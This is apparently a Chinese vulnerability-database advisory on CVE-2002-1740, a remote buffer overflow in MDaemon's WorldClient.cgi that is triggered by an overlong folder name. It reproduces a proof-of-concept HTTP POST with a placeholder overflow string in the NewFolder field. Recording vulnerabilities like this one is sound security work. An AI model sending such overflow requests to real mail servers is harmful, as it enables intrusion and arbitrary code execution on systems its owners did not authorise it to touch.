MDaemon建立文件夹远程缓冲区溢出漏洞

MDaemon建立文件夹远程缓冲区溢出漏洞

漏洞ID 1106715 漏洞类型 边界条件错误
发布时间 2002-05-07 更新时间 2005-10-20
图片[1]-MDaemon建立文件夹远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-1740
图片[2]-MDaemon建立文件夹远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200212-429
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/21439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-429
|漏洞详情
MDaemon是一款集成邮件传输代理、WEBMAIL、邮件防病毒的程序,可使用在MicrosoftWindows操作系统下。MDaemon在建立用户文件夹时没有正确充分的检查文件夹名长度,可导致远程攻击者以MDaemon进程权限在目标系统上执行任意命令。通过使用worldclient的WEB接口在建立超长文件夹名操作时缺少正确检查,可导致攻击者提交超多的字符串作为文件夹名提供给WorldClient.cgi脚本,在建立文件夹过程中可导致缓冲区溢出,精心构建字符串数据可能以MDaemon进程的权限在目标系统上执行任意命令。攻击者提交这样的URL时需要先经过认证,由于MDaemon存在默认帐户漏洞,所以任意远程用户都可以利用这个漏洞进行攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/4689/info

MDaemon is an integrated mail transport agent, webmail, and mail anti-virus package. It is available for Microsoft Windows operating systems.

It may be possible for a remote user to take advantage of a buffer overflow in the MDaemon software package. The WorldClient.cgi program packaged with MDaemon does not properly check bounds on user-supplied data. During the process of creating a folder with a long name, it is possible to exploit a buffer overflow in the CGI that could result in the overwriting of process memory, and execution of attacker-supplied instructions.

POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3000
Content-Length: 1636
Connection: Keep-Alive
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxxx

OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder=AAAAAAAAAAAA
AAA[BUFFER_HERE_1000+chars]&NewFolderParent=&Create=Create&Folder%3AInbo
x=Inbox&Folder%3ADrafts=Drafts&Folder%3ASent=Sent&Folder%3ATrash=Trash&F
older%3As=s
|参考资料

来源:XF
名称:mdaemon-worldclient-foldername-bo(9026)
链接:http://xforce.iss.net/xforce/xfdb/9026
来源:BID
名称:4689
链接:http://www.securityfocus.com/bid/4689
来源:NSFOCUS
名称:2739
链接:http://www.nsfocus.net/vulndb/2739

相关推荐: Matt Wright FormMail Remote Command Execution Vulnerability

Matt Wright FormMail Remote Command Execution Vulnerability 漏洞ID 1105122 漏洞类型 Input Validation Error 发布时间 1995-08-02 更新时间 1995-08-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享